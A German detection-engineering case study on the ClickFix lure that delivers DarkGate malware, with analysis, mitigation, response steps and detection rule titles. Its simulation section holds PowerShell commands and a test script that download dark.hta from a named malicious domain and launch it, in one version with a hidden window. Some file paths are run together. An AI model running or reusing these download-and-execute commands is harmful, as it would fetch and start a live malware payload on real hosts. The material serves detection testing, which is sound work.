ClickFix Fallstudie: DarkGate-Malware
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Bericht beschreibt eine Social-Engineering-Methode namens ClickFix, die Benutzer dazu verleitet, einen PowerShell-Befehl zu kopieren und auszuführen, der dann eine bösartige HTA-Datei herunterlädt. Diese HTA-Datei zieht weitere Komponenten nach, darunter ein AutoIt-Skript, das Verzeichnisse erstellt, Dateien ablegt und C2-Kommunikation aufbaut. Die Aktivität wird der DarkGate-Kampagne zugeschrieben und verwendet Base64-Verschleierung sowie Manipulation der Zwischenablage, um eine einfache Erkennung zu vermeiden.
Untersuchung
Analysten entwirrten mehrere Schichten von base64-codiertem Inhalt, der in einer gefälschten Warnseite für Browsererweiterungen eingebettet war, und ermittelten den PowerShell-Befehl, der für das Abrufen von dark.hta von linktoxic34.com verantwortlich ist. Bei Ausführung setzt die HTA eine AutoIt-executable (fckhffh.a3x) ein, die eine DES-Routine ausführt und weitere Nutzlasten startet. Erfasste Netzwerk-Telemetriedaten zeigen HTTP(S)-Verkehr zur bösartigen Domain, gefolgt von einer verketteten Ausführung eines PowerShell-Skripts.
Minderung
Empfohlene Verteidigungsmaßnahmen umfassen Schulungen zur Benutzerbewusstheit, um das Kopieren unbekannter Code-Snippets zu verhindern, das Deaktivieren des Windows-Dialogfelds ‚Ausführen‘ über Gruppenrichtlinien und den Einsatz verhaltensbasierter Antiviruslösungen. Das proaktive Blockieren der bösartigen Domain und die Überwachung von anomalem PowerShell-Ausführungen können das Risiko einer DarkGate-Infektion erheblich verringern.
Reaktion
Wenn ein ClickFix-bezogenes Ereignis identifiziert wird, isolieren Sie das betroffene Endgerät, stoppen Sie alle bösartigen Prozesse, entfernen Sie die HTA- und AutoIt-Artefakte und führen Sie eine forensische Analyse der während des Eindringens erstellten Ordner durch. Aktualisieren Sie die Erkennungslogik, um verdächtige Ausführungsmuster von PowerShell und HTA zu kennzeichnen, und stellen Sie sicher, dass die zugehörige Domain im gesamten Netzwerk blockiert ist.
Angriffsfluss
Erkennungen
Verdächtiges LOLBAS MSHTA Defense Evasion-Verhalten durch Erkennung assoziierter Befehle (via process_creation)
Ansehen
Verdächtige PowerShell-Strings (via powershell)
Ansehen
AutoIT-Binärdatei wurde von ungewöhnlichem Ort ausgeführt (via process_creation)
Ansehen
Verdächtige Dateien im öffentlichen Benutzerprofil (via file_event)
Ansehen
Verdächtige Ausführung aus öffentlichem Benutzerprofil (via process_creation)
Ansehen
Rufen verdächtige .NET-Methoden von PowerShell auf (via powershell)
Ansehen
IOCs (HashSha256) zu erkennen: ClickFix: DarkGate
Ansehen
Erkennung von bösartiger PowerShell-Aktivität für HTA-Datei-Download [Windows-Netzwerkverbindung]
Ansehen
Bösartige PowerShell-Aktivität mit HTA-Ausführung und Zwischenablage-Manipulation [Windows PowerShell]
Ansehen
Simulation der Ausführung
Voraussetzung: Der Telemetrie- und Basislinien-Pre-Flight-Check muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die zum Auslösen der Erkennungsregel entwickelt wurde. Die Befehle und Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und zielen darauf ab, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.
-
Angriffs-Narrativ & Befehle:
Ein Angreifer, der Zugriff mit niedrigen Rechten auf einem kompromittierten Windows-Host erlangt hat, möchte eine bösartige HTA-Nutzlast herunterladen, die in der ClickFix-Kampagne verwendet wird. Um unauffällig zu bleiben, nutzt der Angreifer PowerShell—ein natives Windows-Tool—damit keine externen Binärdateien eingeführt werden. Der Befehl wird direkt in der Konsole ausgeführt (oder über eine geplante Aufgabe) und beinhaltet die exakte URL, auf die die Regel achtet. Der Download wird im Benutzerverzeichnis%TEMP%gespeichert und dann überStart-Process.$url = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta" $out = "$env:TEMPdark.hta" Invoke-WebRequest -Uri $url -OutFile $out Start-Process -FilePath $out -
Regressionstest-Skript: (in sich geschlossen, reproduziert die obigen Schritte)
# ClickFix HTA-Download-Simulation – löst die Sigma-Regel aus $maliciousUrl = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta" $destPath = "$env:TEMPdark.hta" try { Write-Host "[*] Herunterladen der bösartigen HTA-Nutzlast..." Invoke-WebRequest -Uri $maliciousUrl -OutFile $destPath -UseBasicParsing Write-Host "[+] Download abgeschlossen. Nutzlast wird ausgeführt..." Start-Process -FilePath $destPath -WindowStyle Hidden } catch { Write-Error "Download oder Ausführung fehlgeschlagen: $_" } -
Aufräumbefehle: (entfernt die heruntergeladene HTA und alle laufenden Instanzen)
# Entfernen der HTA-Datei und Beenden aller verbleibenden Prozesse $htaPath = "$env:TEMPdark.hta" if (Test-Path $htaPath) { Remove-Item $htaPath -Force Write-Host "[*] HTA-Datei entfernt." } # Beenden Sie jeden Prozess, der möglicherweise von der HTA gestartet wurde (generisches Beispiel) Get-Process | Where-Object {$_.Path -like "*dark.hta*"} | Stop-Process -Force